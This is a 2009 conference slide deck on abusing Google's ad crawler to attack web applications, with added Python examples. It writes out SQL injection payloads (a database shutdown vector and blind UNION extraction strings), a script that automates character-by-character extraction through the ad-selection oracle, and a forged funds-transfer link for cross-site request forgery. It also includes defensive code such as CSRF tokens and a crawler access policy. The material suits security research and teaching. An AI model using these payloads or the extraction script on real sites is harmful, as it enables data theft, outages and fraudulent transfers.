April 30, 2009 Infosecurity Europe 2009

Blame It On The Media(Bot)
Using Google’s Ads For Application Attacks
Amichai Shulman, CTO
Agenda
Who’s Who?
Short History of Google Hacking
Introducing Google Attacks
Why Google Ads?
Attack Details
+
The Search of Death
+
Blindfolded Google SQL Injection
+
Cross Site Ads Forgery
Mitigation Techniques
Summary
Who’s who?
Amichai Shulman
+
CTO and Co-Founder of Imperva
+
More than 15 years experience with information security
+
10 years experience with application security in military and
commercial organizations
Research Team
+
Eldad Chai, Imperva
+
Ohad Lutzky, Technion Haifa
+
Tom Meiri, Technion Haifa
+
Guy Treger, Technion Haifa
Short History of Google Hacking
Google has been part of the hacking landscape for quite
a few years now
In the beginning
+
Classic Google Hacking – search for vulnerable applications
through Google
Past couple of years
+
Automated Google Hacking for vulnerable applications and
sensitive information
+
Google worms (automated, self propagating)
+
Malware distribution (use SEO to promote links to malware
delivery servers)
+
Malvertising (ads that link to malware delivery servers)
Introducing Google Attacks
Use Google servers to attack applications
+
Idea was discussed as early as 2004
Motivation
+
Provide complete anonymity
+
No one suspects Google…
+
No one blocks Google
+
Google servers have deeper reach into application than
anonymous web users
Google's Deep Reach - Example: Direct Access to Experts-Exchange
Google's Deep Reach - Example: Search Google and use Google Cache
Why Use Google Ads
The standard Google crawling bot is rather unpredictable, at
least with respect to timing
Idea came when reviewing application logs for an
application that embedded Google Ads
Google Ads possesses the following characteristics
+
MediaBot can be synchronously invoked by attacker
+
AdWords placement can be made very predictable
Google Ads Mechanics
Three parties take part: the Client (browser), the Web Server hosting the page, and Google (MediaBot)
1) Client: GET url, sent to the Web Server
2) Web Server: content for url, returned to the Client; it contains a placeholder for ads and the script for Google Ads
3) Client: the script retrieves ads for url using http://pagead2.googlesyndication.com/pagead/ads
4) Google (MediaBot): GET url, sent to the Web Server
5) Web Server: content for url, returned to MediaBot
6) Google: ads, returned to the Client
The Search of Death
Use MediaBot to launch an attack that does not require a
server response
Immediate effects can be
+
DoS (application crash)
+
Defacement
+
Arbitrary code execution
How
+
http://pagead2.googlesyndication.com/pagead/ads
+
Takes a url parameter without any sanitization
+
url may refer to any host (not limited to hosts that actually serve ads)
+
MediaBot sends a GET request for the target URL
The Search of Death (cont.)
More details
+
Google limits the size of url, thus complex attack vectors cannot be used directly
+
Google follows redirects, so we used TinyURL for complex attack vectors
Observed effects
+
For a demo application, based on MS SQL Server, with an SQL Injection vulnerability we were able to invoke the following url:
+
http://www.superveda.com/showprods.asp?catId=999 shutdown --
+
The application went down as soon as it was visited by
MediaBot
The Search of Death (cont.)
We have actually seen variants of this attack being used
in the wild
Blindfolded Google SQL Injection
SQL Injection attacks are commonly used for sensitive
information retrieval
The challenge is to extract data through the MediaBot
server
How
+
Google Ads uses page content to determine the set of ads
+
An attacker can review the list of ads returned by Google
+
Craft the attack vector in a way that affects page content
enough to influence the list of ads chosen by Google
+
Make sure page contents are different enough for different
possible responses
Blindfolded Google SQL Injection (cont.)
More details
+
Consider the following URL:
+
http://www.superveda.com/showproducts.asp?catID=9999' UNION SELECT 'donald duck, mickey mouse, goofy', null --
+
For a successful attack, ads related to Disney characters should
be served by Google Ads, for a failed attempt, default set of ads
is expected
+
Life’s never that simple – Google Ads gives priority to keywords
found in the URL itself…
+
Break keywords in URL to be unrecognizable by Google:
+
http://www.superveda.com/showproducts.asp?catID=9999' UNION SELECT 'do'%2B'na'%2B'ld'%2B' du'%2B'ck, '%2B'mi'%2B'ck'%2B'ey'%2B' mo'%2B'us'%2B'e, g'%2B'oo'%2B'fy', null --
Blindfolded Google SQL Injection (cont.)
Yet more details
+
Data must be extracted one character at a time
+
http://www.superveda.com/showproducts.asp?catID=9999' UNION SELECT null, 'do'%2B'na'%2B'ld'%2B' du'%2B'ck, '%2B'mi'%2B'ck'%2B'ey'%2B' mo'%2B'us'%2B'e, g'%2B'oo'%2B'fy', null from information_schema.tables where 1 in (select 1 from information_schema.tables where lower(table_name) > 'aa' and lower(table_name) < 'ab') --
+
It is as tedious as it seems!
+
Use automation…
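The Search of Death round trip (attacker -> pagead/ads?url=... -> MediaBot GET -> target) and the blindfolded extraction above, as one added example that is not code from the deck. It runs entirely offline: the deck's showproducts.asp on www.superveda.com is replaced by a Python function over an in-memory sqlite3 database (so keyword splitting uses sqlite's || instead of MS SQL's + / %2B, and sqlite_master stands in for information_schema.tables), Google's ad selection is a constructed keyword matcher that reproduces the deck's caveat about URL keywords taking priority, and the attacker reads the ad category as a one-bit oracle. All tables, payloads and names are constructed for the demonstration.

```python
"""Blindfolded Google SQL injection, simulated offline (added example)."""
import sqlite3
import string
from urllib.parse import quote, unquote

DISNEY_KEYWORDS = ("donald duck", "mickey mouse", "goofy")

# --- the target: constructed demo database and a deliberately vulnerable page ---
def make_demo_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, cat_id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 1, 'Organic rice'), (2, 2, 'Herbal tea');
        CREATE TABLE admin_users(id INTEGER, login TEXT);
    """)
    return con

def showproducts(con, cat_id):
    """Hypothetical showproducts.asp: catID is concatenated straight into the query."""
    sql = "SELECT name, cat_id FROM products WHERE cat_id = '" + cat_id + "'"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        rows = []                                   # failed query: empty catalogue
    body = " ".join(str(c) for r in rows for c in r if c is not None)
    return "<html><body>" + body + "</body></html>"

# --- Google's side: what MediaBot hands to ad selection (constructed matcher) ---
def select_ads(url, page_html):
    """Keywords in the URL take priority over page content, as the deck observes;
    only when the URL is neutral does the fetched page body decide."""
    if any(k in unquote(url).lower() for k in DISNEY_KEYWORDS):
        return "disney"
    if any(k in page_html.lower() for k in DISNEY_KEYWORDS):
        return "disney"
    return "default"

# --- the attacker ---
PLAIN_KEYWORDS = "'donald duck, mickey mouse, goofy'"
# The deck's MS SQL payload splits keywords with '+' (%2B); sqlite concatenates with ||.
SPLIT_KEYWORDS = ("'do'||'na'||'ld'||' du'||'ck, '||'mi'||'ck'||'ey'||' mo'||'us'||'e, '"
                  "||'g'||'oo'||'fy'")

def payload(keywords, condition):
    # information_schema.tables in the deck becomes sqlite_master here
    return ("9999' UNION SELECT " + keywords + ", NULL FROM sqlite_master "
            "WHERE 1 IN (SELECT 1 FROM sqlite_master WHERE type = 'table' AND "
            + condition + ") --")

def oracle(con, keywords, condition):
    """One round trip: pagead/ads?url=... -> MediaBot GET url -> ads returned.
    True when Disney ads come back, i.e. when the injected condition held."""
    attack = payload(keywords, condition)
    url = "http://www.superveda.com/showproducts.asp?catID=" + quote(attack, safe="")
    page = showproducts(con, attack)            # the response MediaBot fetches
    return select_ads(url, page) == "disney"

def url_keyword_false_positive(con):
    """Unsplit keywords: even a false condition yields Disney ads, from the URL alone."""
    return oracle(con, PLAIN_KEYWORDS, "1 = 0")

ALPHABET = string.ascii_lowercase + string.digits + "_"

def extract_table_name(con):
    """Recover one table name a character at a time by prefix probing, the
    automated form of the deck's lower(table_name) > 'aa' AND < 'ab' test."""
    name, queries = "", 0
    while True:
        for ch in ALPHABET:
            queries += 1
            guess = name + ch
            cond = "substr(lower(name), 1, %d) = '%s'" % (len(guess), guess)
            if oracle(con, SPLIT_KEYWORDS, cond):
                name = guess
                break
        else:                                       # nothing extends the prefix
            return name, queries

if __name__ == "__main__":
    db = make_demo_db()
    print("unsplit keywords, false condition ->", url_keyword_false_positive(db))
    print("recovered table name, queries ->", extract_table_name(db))
```

Each character costs up to one oracle round trip per alphabet symbol, which is why the deck ends with "use automation": even this two-table demo needs well over a hundred MediaBot fetches to recover a single name.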
Cross Site Ads Forgery
Cross Site Request Forgery (CSRF) attacks rely on the
victim being logged-in to the target application when
visiting an attacker controlled page
+
This is opportunistic
The answer (ask Twitter) is to use ads
+
By focusing the ads an attacker can make sure that with very
high probability when an ad is clicked the user is logged in to
the target application
Cross Site Ads Forgery (cont.)
How
+
Create an AdWords account (need stolen credit card…)
+
Create a campaign targeted to the victim application
+
Create an ad that includes a link to the target transaction within
the victim application and (of course) a compelling text
Results
+
We targeted a demo online banking application and chose the link
within our ad to be the following
+
http://www.mybank.com/bankapp/tx_funds.asp?to_account=123456&amount=10000
+
It instructs the application to transfer $10,000 from the current account to account 123456!
+
Considering Google’s pay-per-click billing scheme it seems like a
very cost effective campaign!
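The transaction the ad link fires, as an added example that is not code from the deck: a hypothetical tx_funds.asp that honours a plain GET with the session cookie (the deck's target), beside a hardened version that only accepts a POST carrying a session-bound synchronizer token. The mitigation slide does not cover this defence; it is the standard CSRF countermeasure and defeats the attack whether the link arrives by ad or by any other page. The session store, balances and cookie values are constructed.

```python
"""Cross Site Ads Forgery target: vulnerable transfer handler beside a hardened one."""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

SERVER_KEY = secrets.token_bytes(32)          # per-process secret for CSRF tokens
SESSIONS = {"sess-alice": "alice"}            # constructed: cookie value -> user
BALANCES = {"alice": 50000}                   # constructed account state

class Request:
    """Minimal stand-in for an HTTP request reaching tx_funds.asp."""
    def __init__(self, method, url, cookies=None, form=None):
        self.method, self.url = method, url
        self.cookies, self.form = cookies or {}, form or {}

def logged_in_user(req):
    return SESSIONS.get(req.cookies.get("session"))

def tx_funds_vulnerable(req):
    """The deck's target: a GET with the session cookie is all it takes."""
    user = logged_in_user(req)
    if user is None:
        return 401, "login required"
    q = parse_qs(urlparse(req.url).query)
    to_account, amount = q["to_account"][0], int(q["amount"][0])
    BALANCES[user] -= amount
    return 200, "transferred %d to %s" % (amount, to_account)

def csrf_token(session_cookie):
    """Token the bank embeds in its own transfer form, bound to the session."""
    return hmac.new(SERVER_KEY, session_cookie.encode(), hashlib.sha256).hexdigest()

def tx_funds_hardened(req):
    """State changes only via POST carrying a token an ad click cannot supply."""
    user = logged_in_user(req)
    if user is None:
        return 401, "login required"
    if req.method != "POST":
        return 405, "state-changing request must be POST"
    expected = csrf_token(req.cookies["session"])
    if not hmac.compare_digest(req.form.get("csrf_token", ""), expected):
        return 403, "missing or invalid CSRF token"
    to_account, amount = req.form["to_account"], int(req.form["amount"])
    BALANCES[user] -= amount
    return 200, "transferred %d to %s" % (amount, to_account)

AD_LINK = "http://www.mybank.com/bankapp/tx_funds.asp?to_account=123456&amount=10000"

def ad_click(handler):
    """A logged-in victim clicks the attacker's ad: the browser sends a plain GET
    with the bank's session cookie attached. Returns (status, amount moved)."""
    before = BALANCES["alice"]
    status, _ = handler(Request("GET", AD_LINK, cookies={"session": "sess-alice"}))
    return status, before - BALANCES["alice"]

def legitimate_transfer():
    """The bank's own form: POST with the session-bound token; returns the status."""
    req = Request("POST", "http://www.mybank.com/bankapp/tx_funds.asp",
                  cookies={"session": "sess-alice"},
                  form={"to_account": "654321", "amount": "100",
                        "csrf_token": csrf_token("sess-alice")})
    return tx_funds_hardened(req)[0]

if __name__ == "__main__":
    print("vulnerable handler, ad click:", ad_click(tx_funds_vulnerable))
    print("hardened handler, ad click:  ", ad_click(tx_funds_hardened))
    print("hardened handler, own form:  ", legitimate_transfer())
```

The token is derived from the session cookie with a server-side key, so the attacker's ad cannot embed a valid one; a random per-session token stored server-side works equally well. Rejecting GET for state changes is not a defence on its own (a form on the attacker's page can POST), which is why the token check is the part that matters.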
Mitigation Techniques
What I expect from Google
+
Make sure MediaBot only scans hosts enrolled in AdSense
+
Sanitize URLs given to MediaBot for known attack patterns
+
When adding a link to an ad make sure that the AdWords
account owner also owns the target of the link
What application owner can do
+
Block access of MediaBot if your server does not serve Google
Ads
+
If you do serve Google Ads, restrict MediaBot access to only
those URLs that serve them.
+
Never trust a request from any IP. Apply all security checks and
rules to any request even if coming from Google
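The three application-owner measures above turned into one request policy and replayed over an access-log excerpt, as an added example that is not the deck's code. The user agent string Mediapartners-Google is the one Google documents for its AdSense crawler (the deck does not name it); the ad-serving pages, the integer-only parameter list and the log lines are constructed. The policy blocks the crawler from pages that serve no ads, and the input validation runs for every client, Google included, since the user agent header is chosen by whoever sends the request.

```python
"""Request policy for the AdSense crawler, following the mitigation slide."""
import re
from urllib.parse import parse_qs, urlparse

MEDIABOT_UA = "Mediapartners-Google"          # Google's AdSense crawler user agent
AD_PAGES = {"/", "/showproducts.asp"}         # constructed: pages embedding the ad script
INTEGER_PARAMS = {"catid"}                     # constructed: parameters that must be integers

def policy(method, path, query, user_agent, serves_google_ads=True):
    """Decide one request; returns (HTTP status, reason)."""
    if MEDIABOT_UA in user_agent:
        if not serves_google_ads:
            return 403, "site serves no Google Ads, MediaBot has no business here"
        if path not in AD_PAGES:
            return 403, "MediaBot restricted to pages that serve ads"
    # From here on every client is treated alike: the user agent header is
    # attacker-controlled, so a Google name can only tighten checks, never relax them.
    if method != "GET":
        return 405, "read-only page"
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() in INTEGER_PARAMS and not all(v.isdigit() for v in values):
            return 400, "parameter %s must be an integer" % name
    return 200, "ok"

LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                      r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Constructed access-log excerpt (combined log format): a normal MediaBot fetch,
# the deck's shutdown vector arriving via MediaBot, a MediaBot fetch of a page
# without ads, and a non-Google client trying the UNION vector.
SAMPLE_LOG = """
66.249.71.1 - - [30/Apr/2009:10:00:01 +0100] "GET /showproducts.asp?catID=7 HTTP/1.1" 200 5120 "-" "Mediapartners-Google"
66.249.71.1 - - [30/Apr/2009:10:00:02 +0100] "GET /showproducts.asp?catID=999%20shutdown%20-- HTTP/1.1" 500 0 "-" "Mediapartners-Google"
66.249.71.1 - - [30/Apr/2009:10:00:03 +0100] "GET /admin/export.asp HTTP/1.1" 200 9000 "-" "Mediapartners-Google"
198.51.100.7 - - [30/Apr/2009:10:00:04 +0100] "GET /showproducts.asp?catID=9999%27%20UNION%20SELECT%20null,null-- HTTP/1.1" 200 600 "-" "Mozilla/5.0"
"""

def replay(log_text, serves_google_ads=True):
    """Run the policy over log lines; returns [(path, status, reason), ...]."""
    decisions = []
    for line in log_text.strip().splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                              # skip lines in another format
        target = urlparse(m.group("target"))
        status, reason = policy(m.group("method"), target.path, target.query,
                                m.group("ua"), serves_google_ads)
        decisions.append((target.path, status, reason))
    return decisions

if __name__ == "__main__":
    for decision in replay(SAMPLE_LOG):
        print(decision)
```

Replaying the excerpt gives 200 for the ordinary fetch, 400 for both injection attempts (the one via MediaBot included) and 403 for the crawler's visit to the admin page; with serves_google_ads=False every MediaBot request is refused. The allowlist only ever narrows what a Google-labelled client may reach, so a spoofed user agent gains nothing.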
Summary
We have shown that specific Google services can be
exploited to directly attack applications.
+
The actual list of exploitable services is probably not limited to
the ones demonstrated here (e.g. we know Google Translate
can be abused)
+
Other online services (other search engines, applications like
Dapper) can probably be abused just the same
Using automation of classic Google Hacking an attacker
can find a large set of potential target applications
regardless of their value or visibility
Summary
No one is safe
+
You can’t claim safety by “low visibility” or “low value”
+
Attackers use search engine related services to find your
application and (as shown today) exploit it.
Regardless of application size and visibility you must
apply web application security solutions